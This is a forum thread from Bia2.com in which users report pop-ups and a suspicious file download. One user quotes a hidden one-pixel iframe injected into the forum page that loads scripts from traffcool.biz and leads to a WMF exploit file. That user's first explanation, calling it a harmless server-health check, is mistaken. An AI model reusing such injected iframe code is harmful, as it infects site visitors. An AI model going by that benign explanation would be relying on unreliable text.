Forum | Bia2.com
Sign in to follow this  
saeed monajjem

is bia 2 working

A quick Q!

I see a window pop up everytime I click on something. something similar to the time when this forum had a virus. does anyone know why this is happening?!

one thing I forgot to make clear....this only happens on this forum.

yep same here

that's why i can't view the forums when i'm at home :damn:

since not every user has this issue and for our better understanding of the problem, we would like to ask those who suffer to take a screen shot when this happens and show us (either here or email us)! hopefully we can solve this really soon!

I am ok ! usin 4 pcS and 5 diffrent servers ! i think,''they' got a big virus in theire pcS :silly_wft:

ok well i did these yesterday but i was having such hard time logging in that i didn't have time or the nerves to do it at home so here are the links to the pix i took

btw i'm not at home right now cuz i cant post with my own computer

141414.jpg

121212.jpg

5768.jpg

hmmm. . .

is admin sure it aint a virus? cuz everytime a blank page comes up a window pops up asking if i want to download a file call spizbic...or something like that!???

kodoom hasoudi virus dade :punishing_wft:

I don't think it's a virus.

My Internet Explorer produced exactly the same behavior you are describing; to test I kept clicking OK on the propt to run the script but nothing happened as I suspected. By the way, anyone of you using Internet Explorer should stop using it ASAP and switch to the superior Firefox browser Well, upon taking a closer look I found that Bia2 has an enbedded piece of code at the end of its main forum page that references an external site called traffcool.biz:

<iframe src="http://traffcool.biz/dl/adv542.php" frameborder=0 width=1 height=1 scrolling=no></iframe>

This is actually the culprit of the problems people were having. From what I could gather, the page "adv542.php" runs a script that checks the health or stability of Bia2's apache HTTP server. (Though, judging by the name of the domain it may also be some kind of traffic verification counter for purposes of legitimizing traffic in order to sell ad space; I could be wrong.) Anyway, if the scrip does check for stability/health, one of two things were happening:

A] Bia2's server was having problems

B] The script or the script's site (http://traffcool.biz) was having problems

The result was that when the malfunction took place, the browser could not interpret the commands properly and caused it to run external scripts (the pop ups) and download the executable or DLL associated with the script commands.

Maybe the server just needed a reboot or a patch to a previously unknown glitch. Whatever it might have been, it is rare since Apache servers are rock-steady. It is definitely not an issue with Bia2's domain, DNS servers (ns1.bia2.com, ns2.bia2.com) nor domain registar (RegisterFly.com, enom.com).

:lol:

Quick update:

I thought the problem was fixed, but I tested it with IE and it is still there. One thing I observed is that the "adv542.php" makes reference to yet another page from traffcool.biz called "bag.htm" (Complete URL reads http://traffcool.biz/dl/bag.htm) This page has a does have a JavaScript Applet that fails to run/initialize properly. Seems like it tries to log-in some kind of server-side user into a server-side account, however the server is not recognizing the user. Error reads:

Line: 1

Char: 1

Error: Member not found.

Code: 0

URL: http://traffcool.biz/dl/bag.htm

Therefore chances are that there is nothing wrong with Bia2 itself but rather with the code over at traffcool.biz (adv542.php and/or bag.htm). Someone should let them know.

More information in the enbedded URL. Following the root of http://traffcool.biz shows:

"

This page is used to test the proper operation of the Apache HTTP server after it has been installed. If you can read this page, it means that the Apache HTTP server installed at this site is working properly.

The fact that you are seeing this page indicates that the website you just visited is either experiencing problems, or is undergoing routine maintenance.

"

ATTENTION: xpladv542[1].wmf pop-up

I think there may be reason of concern there. WMF stands for Windows Metafile and there is in fact a security/vulnerability flaw that allows that file to run code that could inject spyware, viruses or worms into your computer. Hence that may in fact be the script pop-up windows that you see in IE.

Description of vulnerability:

http://en.wikipedia.org/wiki/Windows_Metafile_vulnerability

Microsoft WMF flaw warning:

http://www.microsoft.com/technet/security/...n/ms06-001.mspx

Possible Fix (patch) for Windows XP users:

http://www.microsoft.com/downloads/details...&displaylang=en

Again, I just recommend everyone using Windows to drop Internet Explorer and start using Firefox. Firefox is not affected by this flaw.

ok well i did these yesterday but i was having such hard time logging in that i didn't have time or the nerves to do it at home so here are the links to the pix i took

141414.jpg

121212.jpg

5768.jpg

I have the same problem.............chikarkoonam :angry:

I use McAfee Security Center (which I think is the best out) along with Ad-aware and Spybot... they seemed to work very well finding and getting rid of the trojans which infected the site.. I also use FireFox web browser... and you should too!! :clap2:

Thank you tara jan for the caps! we are working on it!

no problem! :dance_baby_wft: :dance_baby_wft: I hope things go back to normal soon! :clap2: :clap2: :bounce: :bounce:

141414.jpg

121212.jpg

5768.jpg

I have the same problem.............chikarkoonam :angry:

ok i downloaded firefox like kenji said and now i dont have the problem anymore so u should download firefox aroosak

Agha belakhare manam oomadaaaaaaaaaaaaa :DD sharmande ama site....bale :D:))) ye khanoom mohandesi be ma pishnahad kard ke firefox berizim manam alan ba firefox oomadam dorost shode :DD :DD

Alright guys, the problem is hopefully solved! Whenever you get the chance to try please visit the forum via the same old way you did before this! And let us know how it works! Thanks!

Agha belakhare manam oomadaaaaaaaaaaaaa :DD sharmande ama site....bale :D:))) ye khanoom mohandesi be ma pishnahad kard ke firefox berizim manam alan ba firefox oomadam dorost shode :DD :DD

:haha: i wounder who that khanoom mohandes is :whistling:

Alright guys, the problem is hopefully solved! Whenever you get the chance to try please visit the forum via the same old way you did before this! And let us know how it works! Thanks!

montazer boodi man beram firefox download konam ba dorostesh koni dige :huh:

:haha: i wounder who that khanoom mohandes is :whistling:

she'll catch u when u fall

:bandana: Bia2.

My laptop doesnt work thanks to bia2! :punishing_wft:

now I want to make sure amir's computer doesnt work either! :haha: